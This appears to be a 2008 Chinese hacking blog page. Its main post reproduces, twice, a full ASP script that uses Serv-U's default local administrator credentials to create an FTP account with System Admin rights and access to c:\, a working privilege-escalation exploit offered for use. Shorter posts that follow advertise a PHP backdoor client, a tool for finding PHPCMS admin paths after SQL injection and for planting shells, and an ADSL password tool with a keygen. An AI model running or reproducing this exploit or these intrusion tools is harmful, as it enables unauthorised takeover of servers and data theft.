Serv-U提权通杀asp脚本(支持SU7)
[ 2008/10/07 11:51 | by selboo ]
文章作者:xiaok[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)
一直通杀到su7~~
用来加ftp帐号的......
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)
一直通杀到su7~~
用来加ftp帐号的......
<title>Serv-U TOOL</title>
<style type="text/css">
body {
background-color: #333333;
}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {
color: #333333;
border: 1px solid #000000
#;
}
.TextBox {border: 1px solid #084B8E}
body,td,th {
color: #CCCCCC;
}
</style>
<p align="center">Serv-U Local Add User with ASP</p>
<p align="center">Author: Xiao.K</p>
<form name="form1" method="post" action="">
<p align="center">
------------------Serv-U Information------------------
<br>
user:
<input name="duser" type="text" class="TextBox" id="duser" value="LocalAdministrator">
<br>
pwd :
<input name="dpwd" type="text" class="TextBox" id="dpwd" value="#l@$ak#.lk;0@P">
<br>
port:
<input name="dport" type="text" class="TextBox" id="dport" value="43958">
<br>
---------------------Add User!!! ---------------------
<BR>
Domain:
<input name="domain" type="text" class="TextBox" id="domain" value="secdst" />
<br>
FTP USER:
<input name="fuser" type="text" class="TextBox" id="fuser" value="xiaok">
<br>
FTP PASS:
<input name="fpass" type="text" class="TextBox" id="fpass" value="bbs.secdst.net">
<br>
FTP PORT:
<input name="fport" type="text" class="TextBox" id="fport" value="21">
<br>
FTP PATH:
<input name="fpath" type="text" class="TextBox" id="fpath" value="c:\\">
<br>
Privilege
<select para=value name="privilege">
<option value=2>Read-only Admin</option>
<option value=3>Group Admin</option>
<option value=4>Domain Admin</option>
<option value=5>System Admin</option>
</select>
</p>
<p align="center">
<input name="radiobutton" type="radio" value="add" checked class="TextBox">
Add User
<input type="radio" name="radiobutton" value="del" class="TextBox">
Del User </p>
<p align="center">
<input name="Submit" type="submit" class="buttom" value="Run" />
</p>
</form>
<%
user = request.Form("duser")
pass = request.Form("dpwd")
port = request.Form("dport")
domain = request.Form("domain")
fuser = request.Form("fuser")
fpass = request.Form("fpass")
fport = request.Form("fport")
fpath = request.Form("fpath")
privilege=request.Form("privilege")
select case privilege
case 2:
privilege="ReadOnly"
case 3:
privilege="Group"
case 4:
privilege="Domain"
case 5:
privilege="System"
end select
if request.Form("radiobutton") = "add" Then
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & " DynIPName=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _
"-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=" & privilege & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
'--------
'On Error Resume Next
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", ""
xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit
Set xPost =nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &"</div>"
elseif request.Form("radiobutton") = "del" Then
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
deluser = "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf
quit = "QUIT" & vbCrLf
Set xPost3 = CreateObject("MSXML2.XMLHTTP")
xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True
xPost3.Send loginuser & loginpass & mt & deluser & quit
Set xPOST3=nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &" have deleted</div>"
else
response.write "<div align="&chr(34 )&"center"&chr(34 )&">let's Start!!!</div>"
end if
%>
<style type="text/css">
body {
background-color: #333333;
}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {
color: #333333;
border: 1px solid #000000
#;
}
.TextBox {border: 1px solid #084B8E}
body,td,th {
color: #CCCCCC;
}
</style>
<p align="center">Serv-U Local Add User with ASP</p>
<p align="center">Author: Xiao.K</p>
<form name="form1" method="post" action="">
<p align="center">
------------------Serv-U Information------------------
<br>
user:
<input name="duser" type="text" class="TextBox" id="duser" value="LocalAdministrator">
<br>
pwd :
<input name="dpwd" type="text" class="TextBox" id="dpwd" value="#l@$ak#.lk;0@P">
<br>
port:
<input name="dport" type="text" class="TextBox" id="dport" value="43958">
<br>
---------------------Add User!!! ---------------------
<BR>
Domain:
<input name="domain" type="text" class="TextBox" id="domain" value="secdst" />
<br>
FTP USER:
<input name="fuser" type="text" class="TextBox" id="fuser" value="xiaok">
<br>
FTP PASS:
<input name="fpass" type="text" class="TextBox" id="fpass" value="bbs.secdst.net">
<br>
FTP PORT:
<input name="fport" type="text" class="TextBox" id="fport" value="21">
<br>
FTP PATH:
<input name="fpath" type="text" class="TextBox" id="fpath" value="c:\\">
<br>
Privilege
<select para=value name="privilege">
<option value=2>Read-only Admin</option>
<option value=3>Group Admin</option>
<option value=4>Domain Admin</option>
<option value=5>System Admin</option>
</select>
</p>
<p align="center">
<input name="radiobutton" type="radio" value="add" checked class="TextBox">
Add User
<input type="radio" name="radiobutton" value="del" class="TextBox">
Del User </p>
<p align="center">
<input name="Submit" type="submit" class="buttom" value="Run" />
</p>
</form>
<%
user = request.Form("duser")
pass = request.Form("dpwd")
port = request.Form("dport")
domain = request.Form("domain")
fuser = request.Form("fuser")
fpass = request.Form("fpass")
fport = request.Form("fport")
fpath = request.Form("fpath")
privilege=request.Form("privilege")
select case privilege
case 2:
privilege="ReadOnly"
case 3:
privilege="Group"
case 4:
privilege="Domain"
case 5:
privilege="System"
end select
if request.Form("radiobutton") = "add" Then
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & " DynIPName=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _
"-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=" & privilege & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
'--------
'On Error Resume Next
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", ""
xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit
Set xPost =nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &"</div>"
elseif request.Form("radiobutton") = "del" Then
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
deluser = "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf
quit = "QUIT" & vbCrLf
Set xPost3 = CreateObject("MSXML2.XMLHTTP")
xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True
xPost3.Send loginuser & loginpass & mt & deluser & quit
Set xPOST3=nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &" have deleted</div>"
else
response.write "<div align="&chr(34 )&"center"&chr(34 )&">let's Start!!!</div>"
end if
%>
lanker一句话PHP后门客户端3.0内部版
[ 2008/10/06 17:06 | by selboo ]
PPLive v2.x简易去广告补丁 v1.03
[ 2008/09/30 00:53 | by selboo ]
PPlive v2.0.0.18 Beta前2天发布了,新版本体验后的整体感觉还不错,具体体验参见这里。但是新版本中的广告似乎成了顽疾,目录的变更和内容的转变,导致以前的去广告方法不在适用。新版发布几天,未见高人出手,于是打算自己动手去除广告。
PPLive v2.x简易去广告补丁
[sfile]
下载文件 (已下载 4 次)[/sfile]
文件: PPLive NoAD v1.03.exe
大小: 109912 字节
文件版本: 1.0.3.0928
修改时间: 2008年9月28日, 16:57:50
MD5: 74DE306B3E5A9EE456BDA8EE792076BE
SHA1: CBF2EAC0AA09E259B68F49F937080A2A345F48A0
CRC32: 38199F09
PPLive v2.x简易去广告补丁
[sfile]
下载文件 (已下载 4 次)文件: PPLive NoAD v1.03.exe
大小: 109912 字节
文件版本: 1.0.3.0928
修改时间: 2008年9月28日, 16:57:50
MD5: 74DE306B3E5A9EE456BDA8EE792076BE
SHA1: CBF2EAC0AA09E259B68F49F937080A2A345F48A0
CRC32: 38199F09
PHPCMS2007爆路径及后台工具
[ 2008/09/27 23:23 | by selboo ]
from:http://www.t00ls.net/viewthread.php?tid=50&extra=page%3D1
简单写了个工具。方便大家使用。主要是在存在注入的时候使用
得到密码却找不到后台。可以帮你找到后台
得到MD5破不出密码。可以帮你找到路径。读取数据库配置文件。或许这个明文密码就是后台密码。也可以用来社工进一步渗透。
或者可以备份shell 到爆出来的路径。
呵呵。喜欢就顶起。。。。。
有bug请及时提出。
--------------------------------
.Net开发。无法运行请安装.Net平台
文件: PhpCms爆路径及后台工具.exe
大小: 24064 字节
文件版本: 1.0.0.0
修改时间: 2008年9月27日, 6:45:38
MD5: 824032AA6147121E2C1B02B2E80665F2
SHA1: 8AF9BCF23468B6C748D98AB1F11816CCC3EF6D12
CRC32: FB8C22D8
[sfile]下载文件 (已下载 7 次)[/sfile]
简单写了个工具。方便大家使用。主要是在存在注入的时候使用
得到密码却找不到后台。可以帮你找到后台
得到MD5破不出密码。可以帮你找到路径。读取数据库配置文件。或许这个明文密码就是后台密码。也可以用来社工进一步渗透。
或者可以备份shell 到爆出来的路径。
呵呵。喜欢就顶起。。。。。
有bug请及时提出。
--------------------------------
.Net开发。无法运行请安装.Net平台
文件: PhpCms爆路径及后台工具.exe
大小: 24064 字节
文件版本: 1.0.0.0
修改时间: 2008年9月27日, 6:45:38
MD5: 824032AA6147121E2C1B02B2E80665F2
SHA1: 8AF9BCF23468B6C748D98AB1F11816CCC3EF6D12
CRC32: FB8C22D8
[sfile]
下载文件 (已下载 7 次)Adsl密码终结者2005+注册机
[ 2008/09/25 15:42 | by selboo ]
Adsl密码终结者2005--很老的一个工具了,
今天讲课用到了,就收藏下
文件: QiQi.exe
大小: 9204 字节
文件版本: 1.00
修改时间: 2005年6月1日, 0:24:14
MD5: C47C00042A08F548225FAB7D932F0516
SHA1: 44E82AA2986EAEEB774DA987A355B6F5E503B73D
CRC32: A4D0C267
文件: Setup.exe
大小: 3051385 字节
修改时间: 2005年5月27日, 13:52:36
MD5: 72D57EC0A6AB0E358223EE31A777A093
SHA1: 0435FBACBE458E7DC095DDC65947B0B5969E06FE
CRC32: 7E9124F9
下载文件 (已下载 102 次)
下载文件 (已下载 72 次)
今天讲课用到了,就收藏下
文件: QiQi.exe
大小: 9204 字节
文件版本: 1.00
修改时间: 2005年6月1日, 0:24:14
MD5: C47C00042A08F548225FAB7D932F0516
SHA1: 44E82AA2986EAEEB774DA987A355B6F5E503B73D
CRC32: A4D0C267
文件: Setup.exe
大小: 3051385 字节
修改时间: 2005年5月27日, 13:52:36
MD5: 72D57EC0A6AB0E358223EE31A777A093
SHA1: 0435FBACBE458E7DC095DDC65947B0B5969E06FE
CRC32: 7E9124F9
下载文件 (已下载 102 次)下载文件 (已下载 72 次)
